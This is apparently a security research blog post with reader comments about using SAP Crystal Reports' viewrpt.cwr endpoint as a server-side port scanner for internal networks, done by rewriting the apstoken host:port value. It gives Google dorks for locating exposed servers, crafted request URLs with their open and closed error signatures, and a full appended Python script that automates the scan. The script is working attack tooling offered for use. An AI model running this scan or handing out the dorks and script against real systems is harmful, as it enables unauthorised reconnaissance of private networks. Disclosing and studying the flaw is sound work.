Internal Port Scanning via Crystal Reports

Another fun attack that willis and I found during our SAP BusinessObjects research is that Crystal Reports can be turned into a port scanner for the internal network sitting behind the web server.

The way this works is that when you browse to a Crystal Reports web application (http://hostname/CrystalReports/viewrpt.cwr), the request carries a few parameters that tell the application which SAP backend service (the CMS) to talk to. The problem is that these parameters are controlled by the user rather than by the server. The better design would be for the server to hold that configuration itself, or at most to offer a fixed drop-down list of servers, so that the client never gets to name an arbitrary host and port.

Because the user controls those parameters, they can point the web application at any IP and port on the backend; by default the port is 6400, the CMS port. Being able to choose the IP and port is only half of it. The other half is that the error the application returns differs depending on whether anything accepted the connection on that port, so the responses can be mapped to open and closed and the internal network mapped out programmatically, with the Crystal Reports server doing the connecting on our behalf.

Here are a few nice Google Dorks for finding exposed viewrpt.cwr endpoints:
inurl:viewrpt.cwr
filetype:cwr inurl:apstoken

Here is the resulting mapping. The apstoken parameter has the form host:port@token, and the host:port part is what gets rewritten to the target you want to probe:

http://hostname/CrystalReports/viewrpt.cwr?id=$ID&wid=$WID&apstoken=internal_ip_address:445@$TOKEN

Port Open Response:
# Unable to open a socket to talk to CMS $HOSTNAME:445 (FWM 01005)

http://hostname/CrystalReports/viewrpt.cwr?id=$ID&wid=$WID&apstoken=internal_ip_address:80@$TOKEN

Port Closed Response:
# Server $HOSTNAME:80 not found or server may be down (FWM 01003)

Lastly, the only thing we need to do is loop over whatever IPs and ports we want to scan, substituting each into the apstoken value and reading the FWM code that comes back. Before trusting the results, calibrate the two signatures against a port you know is open (the CMS itself on 6400) and one you know is closed, in case the exact error text differs on the version you are looking at. This is faster than using BeEF’s JavaScript internal port scanning functionality and it doesn’t require client interaction: the server makes the connections for us. Pwn dem v0hns!
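As an added example (not code from the original post), here is a scanner that automates the procedure above: it rewrites the host:port half of apstoken, sends the request, and classifies the reply by the two FWM codes shown in the mapping. The base URL, id, wid and token are placeholders you would take from a real viewrpt.cwr link; the sample responses are constructed from the strings shown above, and the use of port 1 as a "known closed" calibration port is an assumption.

```python
"""Port scan an internal network through a Crystal Reports viewrpt.cwr endpoint.

Added example, not from the original post. It relies on the two FWM error
strings shown in the post; base URL, id, wid, token and hosts are placeholders.
"""
import re
import sys
import urllib.error
import urllib.parse
import urllib.request

# Signatures taken from the error strings in the post: FWM 01005 came back when
# something accepted the connection, FWM 01003 when nothing was listening.
OPEN_RE = re.compile(r"Unable to open a socket to talk to CMS .*\(FWM 01005\)")
CLOSED_RE = re.compile(r"not found or server may be down \(FWM 01003\)")

# Constructed sample responses, modelled on the post's output, so the
# classifier can be checked offline.
SAMPLE_OPEN = "# Unable to open a socket to talk to CMS 10.0.0.5:445 (FWM 01005)"
SAMPLE_CLOSED = "# Server 10.0.0.5:80 not found or server may be down (FWM 01003)"


def classify_response(body: str) -> str:
    """Map a viewrpt.cwr response body to 'open', 'closed' or 'unknown'."""
    if OPEN_RE.search(body):
        return "open"
    if CLOSED_RE.search(body):
        return "closed"
    return "unknown"  # different error text, expired token, WAF page, etc.


def build_url(base: str, rpt_id: str, wid: str, token: str, target: str, port: int) -> str:
    """Rewrite the host:port half of apstoken (host:port@token) to the probe target."""
    params = {"id": rpt_id, "wid": wid, "apstoken": f"{target}:{port}@{token}"}
    return f"{base}?{urllib.parse.urlencode(params, safe=':@')}"


def probe(base, rpt_id, wid, token, target, port, timeout=15):
    """Ask the Crystal Reports server to connect to target:port and classify its answer."""
    url = build_url(base, rpt_id, wid, token, target, port)
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:  # error pages still carry the FWM text
        body = err.read().decode("utf-8", "replace")
    return classify_response(body)


def calibrate(base, rpt_id, wid, token, cms_host, known_closed_port=1):
    """Check both signatures: the CMS on 6400 must read 'open', an unused port 'closed'.

    Port 1 as the closed reference is an assumption; pick one you know is shut.
    """
    got_open = probe(base, rpt_id, wid, token, cms_host, 6400)
    got_closed = probe(base, rpt_id, wid, token, cms_host, known_closed_port)
    return got_open == "open" and got_closed == "closed"


def scan(base, rpt_id, wid, token, target, ports):
    """Return {port: state} for every port, keeping 'unknown' visible rather than dropping it."""
    return {port: probe(base, rpt_id, wid, token, target, port) for port in ports}


def parse_ports(spec: str):
    """Turn '22,80,443-445' into [22, 80, 443, 444, 445]."""
    ports = []
    for part in spec.split(","):
        if "-" in part:
            lo, hi = part.split("-", 1)
            ports.extend(range(int(lo), int(hi) + 1))
        else:
            ports.append(int(part))
    return ports


if __name__ == "__main__":
    if len(sys.argv) != 8:
        sys.exit("usage: cr_portscan.py BASE_URL ID WID TOKEN CMS_HOST TARGET_IP PORTS")
    base, rpt_id, wid, token, cms_host, target, spec = sys.argv[1:]
    if not calibrate(base, rpt_id, wid, token, cms_host):
        print("warning: signatures did not match on the calibration ports; check the FWM text")
    for port, state in scan(base, rpt_id, wid, token, target, parse_ports(spec)).items():
        print(f"{target}:{port}\t{state}")
```

Run it with the base URL, id, wid and token lifted from a working viewrpt.cwr link, the CMS host the application normally talks to (for calibration), and the internal target and port list. Anything classified as unknown is worth reading by hand before deciding it is noise, since a token expiring mid-scan would turn every remaining probe into unknown rather than closed.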

Enjoy!

Regards,
Jabra


3 Responses to Internal Port Scanning via Crystal Reports

  1. [...] This post was mentioned on Twitter by Timeless Prototype, Josh Abraham. Josh Abraham said: Internal Port Scanning via Crystal Reports http://bit.ly/g2O9Rt [...]

  2. Marc Ruef says:

    Hello,

    Nice finding. Is there any slight chance that you see the response on open ports (e.g. for banner grabbing)?

    Regards,

    Marc

    • Jabra says:

      Thanks. As I mentioned in the blog post, open ports contain the following response:

      “Unable to open a socket to talk to CMS $HOSTNAME:445 (FWM 01005)”

      Regards,
      Jabra
